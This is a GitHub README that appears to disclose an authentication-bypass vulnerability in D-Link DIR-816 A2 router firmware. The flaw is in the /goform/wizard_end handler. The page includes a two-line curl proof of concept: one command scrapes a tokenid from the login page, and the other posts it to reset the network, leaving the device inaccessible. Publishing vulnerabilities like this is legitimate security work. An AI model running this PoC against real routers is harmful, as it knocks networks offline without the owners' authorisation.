Skip to content

Latest commit

 

History

History
36 lines (21 loc) · 921 Bytes

readme.md

File metadata and controls

36 lines (21 loc) · 921 Bytes

D-link DIR-816 A2_v1.10CNB04.img Initializing the network without authentication

Firmware information

Affected version

The picture above shows the latest firmware for this version

Vulnerability details

Vulnerability occurs in /goform/wizard_end, Initialize the network without authentication

Poc

The first thing you need to do is to get the tokenid

curl http://192.168.0.1/dir_login.asp | grep tokenid

Then run the following poc

curl -i -X POST http://192.168.0.1/goform/wizard_end -d tokenid=xxxx

now inaccessible